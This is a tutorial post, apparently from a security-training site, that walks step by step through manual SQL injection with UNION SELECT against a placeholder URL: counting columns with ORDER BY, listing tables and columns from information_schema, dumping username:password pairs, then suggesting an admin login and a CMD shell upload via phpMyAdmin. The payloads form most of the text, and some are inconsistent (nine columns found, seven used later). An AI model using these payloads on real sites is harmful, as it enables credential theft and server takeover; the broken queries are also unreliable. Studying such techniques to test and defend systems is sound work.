Guide: How to Manually Perform SQL Injection with UNION SELECT

August 11, 2015 | Views: 29813

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

This is not shared with you so that you’ll go out now and do something illegal. I want you to read this and learn to actually train and do this on your own or use with others that have given you a thumbs up to try it out.

Hello to all of you and welcome to another contribution. This time, I’ll share how to manually perform SQL Injection using the UNION SELECT method.

 

For all of you that are doing SQL Injection and using open sources, software or whatever doing the work for you: if you don’t already know how to manually do SQL Injection, it’s time for you to learn it. Nothing is easy; there’s still a lot of things to remember. So, like everyone else, take notes to remember this because.

Our target today is: https://target.com/index.php?id=5

We want to find out if our target if vulnerable to SQL. Let’s check if an MYSQL errors come up when we’re adding a ( ‘ ) into the syntax: https://target.com/index.php?id=5

…And it did!

You have an error in your SQL syntax; check the manual that corresponds to your….. Continued

So, it’s time to make sure we actually can work this out like we want. We’re going to work with “ORDER BY” – the order by helps us to find out how many columns there are. Let’s start out with adding 5 – at the start – to see if it goes all normal or an error comes up when adding too many.

  • https://target.com/index.php?id=5 ORDER BY 5– (it still looks all normal here; let’s increase the number 5 more.)
  • https://target.com/index.php?id=5 ORDER BY 10– (oops, something happened here; it comes up with this error…)

Unknown column ’10’ in ‘order clause’Unknown column ’10’ in ‘order clause’

Alright, so instead of trying to add 10, we’re going to add 9– for example, and whoops, the error disappears. Now know there’s 9 columns on our target. It’s time to take it to another step, since we know the columns. We want to know which one we’re going to inject into. In that vein, we’re going to work with UNION SELECT.

  • https://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,5,6,7,8,9– (Something came up, some numbers, it’s easy here! There are small numbers/normal numbers and ones that are different; the number that’s bold.

5

3

We know the column we’re going to work with here is 5. So, let’s inject it now by doing following:

  • http://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(table_name),6,7 from information_schema.tables

CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS

You will see much more than this. It’s different from what you see – but one thing is one hundred; you’re inside. Now, we want to go even further with this. We want to see our valuable stuff. So that we can actually see some stuff to work with, we’re going to type:

  • http://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_schema=database()–

ID,USERNAME,LIST,PASSWORD,MAIL,LINKS,…….

And, if it’s even worse, PHPMYADMIN, MYSQL, CREDITCARDS, PSN and such can be there also. It’s a very dangerous situation for the target. We have now decided that we want to get the USERNAME:PASSWORD from our target.

  • http://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7 from database–

administrator:badsecurity

This target has a plaintext password ups, so dumb! In other situations, you’ll see the password normally in a MD5 Hash and some others are encrypted. We now have the username:password. Let’s find the administration login and use it. If the target has PHPMYADMIN there, it was just about to actually find the PHPMYADMIN Panel. From there, you can do something very dangerous also by adding a CMD Shell. Then, you can actually upload another shell with more features.

As a little extra I uploaded a pastebin to show you some additional methods than just UNION SELECT (but now in a tutorial, just an overview).

http://pastebin.com/ASmH7LRj

 

Any questions, feel free to PM me!

 

Image Credit: @infosectdk

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
27 Comments
  1. Glad that you all like this share. Hope that everyone can use this and hopefully also perfectly execute. Else pm me in advance if any problems.

    Best regards, Kevin Mark.

Page 5 of 5«12345
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

Cybrary|0P3N

Is Linux Worth Learning in 2020?
Views: 332 / December 14, 2019
How do I Get MTA Certified?
Views: 924 / December 12, 2019
How much does your PAM software really cost?
Views: 1377 / December 10, 2019
How Do I Get into Android Development?
Views: 1755 / December 8, 2019

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel